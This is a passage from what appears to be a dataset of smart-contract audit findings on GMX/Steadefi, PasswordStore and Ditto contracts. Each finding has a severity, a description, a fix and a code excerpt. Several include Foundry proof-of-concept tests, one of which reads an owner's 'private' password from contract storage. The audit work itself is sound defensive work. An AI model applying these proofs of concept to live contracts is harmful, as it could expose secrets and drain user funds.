_maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n -GMXOracle.sol#L280: function `getLpTokenAmount` icorrectly assumes that the returned price is in 18 decimal places. But it is 30 decimal places.чlowч`GMXOracle` oracle has a function getLpTokenAmount which is in scope. This is Used in keeper script to calculate how much LP tokens for given USD value.\\nThis function returns the `lpTokenAmount` with 30 decimal places instead of 18 as the function assumes.\\nLets look at the function getLpTokenAmount\\n```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n\\nSAFE_MULTIPLIER is in 18 decimal places.\\nThe values returned from the function `_lpTokenValue` is in 18 decimal places. Refer the line\\nSo the final returned value from the function `getLpTokenAmount` is (1e30 * 1e18) / 1e18 = 1e30чGMXOracle.sol#L280: function `getLpTokenAmount` icorrectly assumes that the returned price is in 18 decimal places. But it is 30 decimal places.\\nUpdate the function `getLpTokenAmount` as shown below.\\n```\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue; ------ remove\\n\\n return (givenValue * SAFE_MULTIPLIER) / (_lpTokenValue * 1e12); ---- add\\n \\n }\\n```\\nчOverestimating the lpToken amount for the given USD value.ч```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n -`Chainlink.latestRoundData()` may return stale resultsчlowчThe `_getChainlinkResponse()` function is used to get the price of tokens, the problem is that the function does not check for stale results.\\nThe `ChainlinkOracle._getChainlinkResponse()` function is used to get latest Chainlink response.\\n```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n\\nThe problem is that there is not check for stale data. There are some reasons that the price feed can become stale.чRead the updatedAt return value from the `Chainlink.latestRoundData()` function and verify that is not older than than specific time tolerance.\\n```\\nrequire(block.timestamp - udpatedData < toleranceTime, \"stale price\");\\n```\\nчSince the token prices are used in many contracts, stale data could be catastrophic for the project.ч```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n -USDC is not valued correctly in case of a depeg, which causes a loss of fundsчlowчUSDC is not valued correctly in case of a depeg, which causes a loss of funds.\\nThe protocol uses a chainlink feed to get prices of a specific token. In this case the token of interest is USDC which is a stable coin. Let us get some context for this issue, from the GMX V2 documentation we can read the following:\\nIn case the price of a stablecoin depegs from 1 USD: To ensure that profits for all short positions can always be fully paid out, the contracts will pay out profits in the stablecoin based on a price of 1 USD or the current Chainlink price for the stablecoin, whichever is higher. For swaps using the depegged stablecoin, a spread from 1 USD to the Chainlink price of the stablecoin will apply. If Chainlink Data Stream prices are used then the spread would be from the data stream and may not be to 1 USD.\\nhttps://gmx-docs.io/docs/trading/v2\\nFrom the above snippet we now know that gmx will never value USDC below 1$ when closing a short or withdrawing from a position, and that gmx uses the spread from 1 usd to the chainlink price is used. The problem here is that Steadefi does not account for this and will continue to use the chainlink price of usdc in a withdraw and swap when calculating the appropriate slippage amount. Let me demonstrate.\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nHere consult calls `_getChainlinkResponse(_feed)` which gets the current value of a token, for our purpose this token is USDC. The problem begins because consult is called by `consultIn18Decimals` and this is called by `convertToUsdValue`, this is then called by `calcMinTokensSlippageAmt`. This function decides how much slippage is appropriate given the value of the asset being withdrawn. The problems is, as i showed, it will use chainlink value of USDC and in case of a depeg, it will use the depegged value. But as i have shown from gmx docs, when withdrawing, the value of USDC will always be valued at 1 or higher. So now we are calculating slippage for a usdc value that is depegged when we are withdrawing on gmx with the pegged assets normal value.\\nFor example\\nthere is a depeg of usdc\\nusdc chainlink value is $ 0.4\\ngmx withdraw value is always $1\\nbecause we use the chainlink value to calc slippage tolerance, we will be using the slippage tolerance for a USDC price of 0.4 when in fact we are valuing USDC at $1 in gmx. The amount of slippage allowed will be very incorrect and in some cases extreme. In case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.чimplement logic specific to stablecoins to handle depegs events. Such would be to always value stable coins at the maximum of the stablecoing proposed value and the chainlink response value. Currently we are only using the chainlink response answer to valuate stable coins like usdc, and as i have explained this is a problem.чIn case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.ч```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n -Depositing to the GMX POOl will return sub-optimal return if the Pool is imbalancedчmediumчWhenever A user deposits tokens to vault, vault create a leverage position depending[delta or delta neutral] in the GMX POOl. performing a proportional deposit is not optimal in every case and depositng tokens in such case will result in fewer LP tokens due to sub optimal trade. Eventually leading to a loss of gain for the strategy vault\\nAlice deposits token A() into the vault to make Delta.Neutral position\\n```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n\\nvault refer to deposit to GMXDeposit library to execute the further logic\\n```\\nFile: GMXDeposit.sol\\n\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n[// rest of code// rest of code// rest of code// rest of code// rest of code.]\\n // Borrow assets and create deposit in GMX\\n (\\n uint256 _borrowTokenAAmt,\\n uint256 _borrowTokenBAmt\\n ) = GMXManager.calcBorrow(self, _dc.depositValue);\\n\\n [// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L54\\nwhich calls calcBorrow on GMXManager Library for borrowing assets and making the position IN GMX POOL\\n```\\nFile: GMXManager.sol\\n\\n /**\\n * @notice Calculate amount of tokenA and tokenB to borrow\\n * @param self GMXTypes.Store\\n * @param depositValue USD value in 1e18\\n */\\n function calcBorrow(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n ) external view returns (uint256, uint256) {\\n // Calculate final position value based on deposit value\\n uint256 _positionValue = depositValue * self.leverage / SAFE_MULTIPLIER;\\n\\n // Obtain the value to borrow\\n uint256 _borrowValue = _positionValue - depositValue;\\n\\n uint256 _tokenADecimals = IERC20Metadata(address(self.tokenA)).decimals();\\n uint256 _tokenBDecimals = IERC20Metadata(address(self.tokenB)).decimals();\\n uint256 _borrowLongTokenAmt;\\n uint256 _borrowShortTokenAmt;\\n\\n [// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code..]\\n\\n // If delta is neutral, borrow appropriate amount in long token to hedge, and the rest in short token\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n // Get token weights in LP, e.g. 50% = 5e17\\n (uint256 _tokenAWeight,) = GMXReader.tokenWeights(self);\\n\\n // Get value of long token (typically tokenA)\\n uint256 _longTokenWeightedValue = _tokenAWeight * _positionValue / SAFE_MULTIPLIER;\\n\\n // Borrow appropriate amount in long token to hedge\\n _borrowLongTokenAmt = _longTokenWeightedValue * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenA), 10**(_tokenADecimals))\\n / (10 ** (18 - _tokenADecimals));\\n\\n // Borrow the shortfall value in short token\\n _borrowShortTokenAmt = (_borrowValue - _longTokenWeightedValue) * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenB), 10**(_tokenBDecimals))\\n / (10 ** (18 - _tokenBDecimals));\\n }\\n[// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXManager.sol#L70\\nHere it consider the current reserve ratio of the pool and deposits in the same ratio.\\nWhile GMX docs clearly state that If deposits try to create balance in the pool[depositing in such way which will make actual token weight of index Token towards the TOKEN_WEIGHT defined in the pool] will get benefit technically more LP tokens and oppose to this less LP token if current deposits imbalance the Pool reserve the ratio Reference\\nEven Curve pools work in the same way. Depositer get benefit if they try to balance the pool reserve making them optimalчDepositing to the GMX POOl will return sub-optimal return if the Pool is imbalanced\\nconsider implementing check and if the pool is imablanced depositing(making levearge position) towards balancing the Index Token's weight will give optimal returns[extra LP tokens ]чIt is clear that Weight of index token will not be always near equal to the Defined Total_Weight of the Pool. So if the pool is imbalanced Depositing into GMXPool will not give optimal returns( resulting in fewer LP token), eventually leading to the loss of gain for the depositers affecting net APRч```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n -The `svTokenValue` function can return overestimated value of each strategy vault share tokenчmediumчThe `GMXReader.svTokenValue` function can return overestimated value of each strategy vault share token due to outdated `totalSupply`, i.e. without including pending management fees for a long period. This issue can cause the protocol unexpected behavior while keepers provide rebalance and when other protocols receive information about shares value.\\nThe `svTokenValue` function calculates the value of each strategy vault share token with the current amount of `totalSupply`, which may not include pending management fees:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n\\nSo the returned share value will be overestimated. The longer the period since the last `mintFee` was called the more overestimated shares value is.чConsider adding `pendingFee` to the totalSupply:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n// Remove the line below\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n// Add the line below\\n return equityValue_ * SAFE_MULTIPLIER / (totalSupply_ // Add the line below\\n pendingFee(self));\\n } \\n```\\nчThe `GMXReader.svTokenValue` function returns an overestimated value of the share token. This issue can cause the protocol unexpected behavior while keepers provide rebalance and when other protocols receive information about the shares value.\\nTools used\\nManual Reviewч```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n -The `afterWithdrawChecks` applies only if user wants to withdraw in tokenA/BчhighчThe `afterWithdrawChecks` check is very important to be sure that important health parameters are in the proper ranges. But the check is inside brackets of the `if user wants to withdraw in tokenA/B` statement. So if the user wants to withdraw LP-token the check is not provided. This can cause unexpected financial losses.\\nThe `afterWithdrawChecks` check is placed inside the brackets of the if-statement of the `GMXProcessWithdraw.processWithdraw` function. This statement checks `if user wants to withdraw in tokenA/B`. In other cases the `afterWithdrawChecks` check is not provided but should.\\n```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\nчI suppose that the check should be placed after the if statement brackets.чThe issue can cause unexpected financial losses.\\nTools used\\nManual Reviewч```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\n -Owner's password stored in the `s_password` state variable is not a secret and can be seen by everyoneчhighчThe protocol is using a `private` state variable to store the owner's password under the assumption that being a \"private\" variable its value is a secret from everyone else except the owner; which is a completely false assumption.\\nIn Solidity, marking a variable as `private` doesn't mean that the data stored in that variable is entirely secret or `private` from all observers of the blockchain. While it restricts direct external access to the variable from other contracts, it's essential to understand that the data on the blockchain is inherently transparent and can be viewed by anyone. Other smart contracts and blockchain explorers can still access and read the data if they know where to look.\\n'Private' in Solidity primarily provides encapsulation and access control within the contract itself, rather than offering complete data privacy on the public blockchain.\\n```\\nstring private s_password;\\n```\\n\\nAforementioned is the `s_password` variable which is being assumed as a secret by the protocol for it being a `private` variable. This is a completely false assumption since all data on the blockchain is public.\\nActors:\\nAttacker: Any non-owner malicious actor on the network.\\nVictim: Owner of the PasswordStore protocol.\\nProtocol: PasswordStore is meant to allow only the owner to store and retrieve their password securely.\\nWorking Test Case:\\n(Note : Though the following code fetches the Victim's password correctly in ASCII format; with my current skills in Solidity I've been struggling to make the `assertEq()` function return `true` when comparing the two strings. The problem seems to be with how the result of `abi.encodePacked()` for `anyoneCanReadPassword` variable fetched from `vm.load` has a bunch of trailing zeroes in it while the same for `victimPassword` doesn't.\\nTherefore my current POC proves the exploit by using `console.log` instead of `assertEq` )\\nWrite and run the following test case in the `PasswordStore.t.sol` test file.\\n```\\nfunction test_any_non_owner_can_see_password() public {\\n string memory victimPassword = \"mySecretPassword\"; // Defines Victim's (Owner's) password\\n vm.startPrank(owner); // Simulates Victim's address for the next call\\n passwordStore.setPassword(victimPassword); // Victim sets their password\\n\\n // At this point, Victim thinks their password is now \"privately\" stored on the protocol and is completely secret.\\n // The exploit code that now follows can be performed by just about everyone on the blockchain who are aware of the Victim's protocol and can access and read the Victim's password.\\n\\n /////////// EXPLOIT CODE performed by Attacker ///////////\\n\\n // By observing the protocol's source code at `PasswordStore.sol`, we notice that `s_password` is the second storage variable declared in the contract. Since storage slots are alloted in the order of declaration in the EVM, its slot value will be '1'\\n uint256 S_PASSWORD_STORAGE_SLOT_VALUE = 1;\\n\\n // Access the protocol's storage data at slot 1\\n bytes32 slotData = vm.load(\\n address(passwordStore),\\n bytes32(S_PASSWORD_STORAGE_SLOT_VALUE)\\n );\\n\\n // Converting `bytes` data to `string`\\n string memory anyoneCanReadPassword = string(\\n abi.encodePacked(slotData)\\n );\\n // Exposes Victim's password on console\\n console.log(anyoneCanReadPassword);\\n}\\n```\\n\\nMake sure to run the test command with `-vv` flag to see the `Logs` in command output.чAll data on the blockchain is public. To store sensitive information, additional encryption or off-chain solutions should be considered. Sensitive and personal data should never be stored on the blockchain in plaintext or weakly encrypted or encoded format.чThis vulnerability completely compromises the confidentiality of the protocol and exposes the sensitive private data of the owner of the protocol to everyone on the blockchain.ч```\\nstring private s_password;\\n```\\n -No check if bridge already existsчlowчIn the current `createBridge` function of the OwnerFacet.sol contract, a critical check to verify if the bridge already exists is missing. This omission can potentially result in double accounting in the yield generation process.\\nIn the rest of the OwnerFacet.sol contract functionality, there are checks in place to prevent the recreation of Vaults or Markets. However, this essential check is absent in the `createBridge()` function. The absence of this check can lead to the unintended creation of duplicate bridges, resulting in double accounting of yield if multiple vaults utilize the same bridge more than once. You can find the missing check in the code here: Link to code.\\nThe potential for double accounting of yield is evident in the following code block:\\n```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo demonstrate this behavior, a simple Proof of Concept (PoC) was created. (The test was placed in the Yield.t.sol file.)\\n```\\nfunction test_double_bridge_push() public {\\n vm.prank(owner);\\n diamond.createBridge(_bridgeReth, Vault.CARBON, 0, 0);\\n diamond.getUndistributedYield(Vault.CARBON); \\n assert(diamond.getUndistributedYield(Vault.CARBON) > 0); // As no yield was generated, this should not be true, but in current situation, it is a proof of double accounting.\\n}\\n```\\nчNo check if bridge already exists\\nTo address this vulnerability, it is recommended to add the following mitigation to the createBridge function:\\n```\\n// rest of code\\n// Add the line below\\n for (uint i = 0; i < s.vaultBridges[vault].length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (s.vaultBridges[vault][i] == bridge) {\\n// Add the line below\\n revert Errors.BridgeAlreadyExist();\\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\n\\nThis change will prevent the inadvertent creation of duplicate bridges and mitigate the risk of double accounting of yield.чIn specific circumstances, if a DAO proposal is confirmed, it could inadvertently trigger the creation of a bridge with the same address for a vault that already uses it. This scenario can lead to double accounting of yield and, as a consequence, potentially expose the protocol to vulnerabilities such as Denial of Service and yield theft.\\nHowever, it's important to note that the likelihood of this issue occurring is relatively low, and the function is governed by the DAO. After discussing this with the sponsor, we have classified this finding as low severity.ч```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n -Loss of precision in `twapPriceInEther` due to division before multiplicationчlowчWhen calculating `twapPriceInEther`, `twapPrice` is divided by 1e6 before multiplication with 1e18 is done.\\n```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L64-L85\\nAccording to the above calculation, the `twapPrice` obtained would be precise upto 6 decimal places. Performing division before multiplying with 1e18 will result in loss of this precision and.\\nExample Scenario\\n```\\ntwapPrice = 1902501929\\ntwapPriceInEther = 1902000000000000000000\\n\\n// if multiplication is performed earlier,\\ntwapPriceInEther = 1902501929000000000000\\n```\\nчPerform the multiplication before division.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/libraries/LibOracle.sol b/contracts/libraries/LibOracle.sol\\nindex 23d1d0a..6962ad7 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/libraries/LibOracle.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/libraries/LibOracle.sol\\n@@ // Remove the line below\\n82,7 // Add the line below\\n82,7 @@ library LibOracle {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n// Remove the line below\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n// Add the line below\\n uint256 twapPriceInEther = (twapPrice * 1 ether) / Constants.DECIMAL_USDC;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n```\\nчPrice used can have -1 (in 18 decimals) difference from the original price.ч```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n -`onERC721Received()` callback is never called when new tokens are minted in Erc721Facet.solчlowчThe ERC721Facet contract does not properly call the corresponding callback when new tokens are minted. The ERC721 standard states that the onERC721Received callback must be called when a mint or transfer operation occurs. However, the smart contracts interacting as users with `Erc721Facet.mintNFT()` will not be notified with the onERC721Received callback, as expected according to the ERC721 standard.\\n`onErc721Received()` isn't called on minting:\\n```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\nчCall `onErc721Received()`чIt can create interoperability issues with users' contractsч```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\n -[L-4] Yield update will not happen at the 1k ETH thresholdчlowчYield updates happen for a vault when the `BRIDGE_YIELD_UPDATE_THRESHOLD` is met for the vault after a large bridge deposit. The `maybeUpdateYield` function handles this logic for updates when that happens (1000 ETH to be exact).\\nThreshold constant from:\\n```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n\\n```\\nFILE: 2023-09-ditto/contracts/facets/BridgeRouterFacet.sol\\n\\nfunction maybeUpdateYield(uint256 vault, uint88 amount) private {\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (\\n zethTotal > Constants.BRIDGE_YIELD_UPDATE_THRESHOLD\\n && amount.div(zethTotal) > Constants.BRIDGE_YIELD_PERCENT_THRESHOLD\\n ) { // @audit should be >= to account for when threshold is met\\n // Update yield for \"large\" bridge deposits\\n vault.updateYield();\\n }\\n }\\n```\\nчChange the `>` operand in the `maybeUpdateYield` function to be `>=`.чIn reality the yield update for the vault will not happen in the instances of 1000 ETH deposits unless the bridge deposit amount into the vault is > 1000 ETH and the percent is greater than 1%.ч```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n -If the dao removes a bridge, user's deposited tokens for that bridge will be lost.чlowчIf the dao removes a bridge for any (non-malicious) reason, user's deposited tokens for that bridge will be lost.\\nIn the `OwnerFacet.sol` the dao of the system has the option to remove a bridge by calling the `deleteBridge()` function. There is no check if there are any assets in the bridge. Also users may deposit funds in the bridge during the voting period.\\nPOC Add the following function in the `BridgeRouter.t.sol`\\n```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log(\"Sender ethEscrowed in vault 2 before deposit: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log(\"Sender ethEscrowed in vault2 after deposit: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(\"Sender ethEscrowed after withdraw: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log(\"Balance of reth in the bridgeRethToBeDeleted: \", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(\"Balance of reth in the bridgeRethToBeDeleted: \", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n }\\n```\\n\\nIn order to run this test, you also have to add\\n```\\n rethA.approve(\\n _bridgeRethToBeDeleted,\\n 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\\n );\\n```\\n\\nto `setUp()` function of the 